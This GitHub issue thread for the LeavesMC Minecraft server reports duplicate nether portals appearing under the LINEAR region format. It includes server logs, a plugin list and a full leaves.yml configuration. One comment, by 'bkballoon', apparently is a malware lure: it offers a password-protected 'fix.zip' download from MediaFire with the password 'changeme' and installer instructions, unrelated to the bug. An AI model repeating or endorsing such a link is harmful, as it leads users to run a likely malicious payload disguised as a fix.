### ISSUE TITLE
LINEAR地图存储格式在特定情况下会遇到地狱门存储问题

### ISSUE THREAD

**Issue by Daodanfd5** [LeavesMC/Leaves#328]
### 服务端版本 LeavesMC Version

[14:57:06 INFO]: This server is running Leaves version 1.21.1-55-master@76d5ab8 (2024-08-25T13:29:48Z) (Implementing API version 1.21.1-R0.1-SNAPSHOT) You are running the latest version Previous version: 1.21.1-54-39440b4 (MC: 1.21.1)

### 预期的行为 Expected behavior

同一个地狱门在进入时不应该重复在不同位置生成不同的地狱门，在下界和主世界维度的均如此

### 观测到的实际行为 Observed/Actual behavior

同一个地狱门在反复传送进入时在较靠近的地方不同位置生成不同的地狱门，且地狱门会重叠生成，怪物传送和玩家进入都会出现该问题。
<img width="970" alt="AOV)} ($(I )MPO86Q7{1TU" src="https://github.com/user-attachments/assets/4498402e-2093-49f4-b08e-441d9471c4d6">
<img width="970" alt="$QR3$G2JN4I%6NC~(4P@%_V" src="https://github.com/user-attachments/assets/4aa5112d-2070-463a-9378-13921b7d05f1">

### 复现步骤 Steps/models to reproduce

设置地图类型为linear并启用自动转换，在主世界特定地点开传送门，然后反复通过传送门有概率出现此问题

### 插件与数据包列表。 Plugin and Datapack List.

[14:55:54 INFO]: Server Plugins (12):
[14:55:54 INFO]: Bukkit Plugins:
[14:55:54 INFO]:  - BlueMap, Chunky, Essentials, EssentialsChat, EssentialsSpawn, ExtraContexts, LuckPerms, mcMMO, MiniMOTD, TabTPS
[14:55:54 INFO]:  Vault, WorldEdit

[14:56:28 INFO]: 已启用3个数据包：[vanilla（内置）], [file/bukkit（世界）], [paper（内置）]
[14:56:28 INFO]: 已无更多可用的数据包

### 更多详细信息。 The more information.

没有收集到坐标信息，有可能是区块边界导致的相关问题
以及去除所有插件后依然存在该问题，因此大概不是由插件引起的。
在地图存储格式修改为anvil后该问题消失，再更改为linear又会出现

**Comment by Daodanfd5** [comment]
配图的应该不是同一个地狱门，但是不影响结论复现应该，更详细的信息收集需要稍晚些

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GLDYM** [comment]
发一下 leaves.yml，这个一般是修复下界门回归和 LINEAR 共用造成的

**Comment by Daodanfd5** [comment]
```yaml
# Configuration file for Leaves.

config-version: 6
settings:
  misc:
    auto-update:
      enable: true
      download-source: application
      allow-experimental: true
      time:
      - '14:00'
      - '2:00'
    extra-yggdrasil-service:
      enable: true
      login-protect: false
      urls:
      - https://skin.mcyou.cn/api/yggdrasil
      - https://littleskin.cn/api/yggdrasil
    disable-method-profiler: true
    no-chat-sign: true
    dont-respond-ping-before-start-fully: true
    server-lang: zh_cn
    server-mod-name: Leaves
    bstats-privacy-mode: false
    force-minecraft-command: true
    leaves-packet-event: true
  fix:
    spigot-EndPlatform-destroy: false
    vanilla-hopper: true
  modify:
    fakeplayer:
      enable: true
      unable-fakeplayer-names:
      - player-name
      limit: 10
      prefix: fa_
      suffix: ''
      always-send-data: true
      resident-fakeplayer: false
      open-fakeplayer-inventory: false
      skip-sleep-check: false
      spawn-phantom: false
      regen-amount: 0.01
      use-action: true
      modify-config: false
    elytra-aeronautics:
      no-chunk-load: false
      no-chunk-height: 500.0
      no-chunk-speed: -1.0
      message: true
      message-start: Flight enter cruise mode
      message-end: Flight exit cruise mode
    redstone-shears-wrench: true
    budding-amethyst-can-push-by-piston: false
    spectator-dont-get-advancement: false
    stick-change-armorstand-arm-status: true
    snowball-and-egg-can-knockback-player: true
    flatten-triangular-distribution: false
    player-operation-limiter: false
    renewable-elytra: -1.0
    stackable-shulker-boxes: 'false'
    force-void-trade: false
    disable-moved-wrongly-threshold: false
    mc-technical-survival-mode: true
    return-nether-portal-fix: false
    use-vanilla-random: false
    fix-update-suppression-crash: true
    bedrock-break-list: false
    disable-distance-check-for-use-item: false
    no-feather-falling-trample: false
    shared-villager-discounts: false
    disable-check-out-of-order-command: false
    despawn-enderman-with-block: false
    creative-no-clip: false
    shave-snow-layers: true
    ignore-lc: false
    disable-packet-limit: false
    lava-riptide: false
    no-block-update-command: false
    no-tnt-place-update: false
    raider-die-skip-self-raid-check: false
    container-passthrough: false
    avoid-anvil-too-expensive: false
    bow-infinity-fix: false
    hopper-counter: false
    spider-jockeys-drop-gapples: -1.0
    renewable-deepslate: false
    renewable-sponges: false
    renewable-coral: 'FALSE'
    fast-resume: false
    force-peaceful-mode: -1
    minecraft-old:
      old-block-entity-behaviour: false
      shears-in-dispenser-can-zero-amount: false
      instant-block-updater-reintroduced: false
      armor-stand-cant-kill-by-mob-projectile: false
      cce-update-suppression: false
      villager-infinite-discounts: false
      copper-bulb-1gt-delay: false
      crafter-1gt-delay: false
      redstone-wire-dont-connect-if-on-trapdoor: false
      zero-tick-plants: false
      rng-fishing: false
      allow-grindstone-overstacking: false
      allow-entity-portal-with-passenger: true
      disable-gateway-portal-entity-ticking: false
      disable-LivingEntity-ai-step-alive-check: false
      fix-fortress-mob-spawn: false
  performance:
    optimized-dragon-respawn: false
    dont-send-useless-entity-packets: true
    enable-suffocation-optimization: true
    check-spooky-season-once-an-hour: true
    optimize-chunk-ticking: true
    entity-target-find-optimization: true
    use-more-thread-unsafe-random: true
    inactive-goal-selector-disable: false
    reduce-entity-allocations: true
    cache-climb-check: true
    biome-temperatures-use-aging-cache: true
    reduce-chuck-load-and-lookup: true
    improve-fluid-direction-caching: true
    cache-ignite-odds: true
    faster-chunk-serialization: true
    cache-world-generator-sea-level: true
    skip-secondary-POI-sensor-if-absent: true
    store-mob-counts-in-array: true
    cache-BlockStatePairKey-hash: true
    optimize-noise-generation: false
    optimize-sun-burn-tick: true
    optimized-CubePointRange: true
    check-frozen-ticks-before-landing-block: true
    skip-entity-move-if-movement-is-zero: true
    skip-cloning-advancement-criteria: false
    skip-negligible-planar-movement-multiplication: true
    fix-villagers-dont-release-memory: false
    remove:
      tick-guard-lambda: true
      inventory-contains-iterators: true
      range-check-streams-and-iterators: true
      damage-lambda: true
  protocol:
    bladeren:
      protocol: true
      mspt-sync-protocol: true
      mspt-sync-tick-interval: 20
    syncmatica:
      enable: true
      quota: false
      quota-limit: 40000000
    pca:
      pca-sync-protocol: false
      pca-sync-player-entity: OPS
    bbor-protocol: false
    jade-protocol: true
    alternative-block-placement: NONE
    appleskin-protocol: true
    xaero-map-protocol: true
    xaero-map-server-id: -1398770544
    servux:
      structure-protocol: true
      entity-protocol: true
    leaves-carpet-support: true
  region:
    format: LINEAR
    linear:
      flush-frequency: 10
      auto-convert-anvil-to-linear: true
      flush-max-threads: -1
      compression-level: 1

```
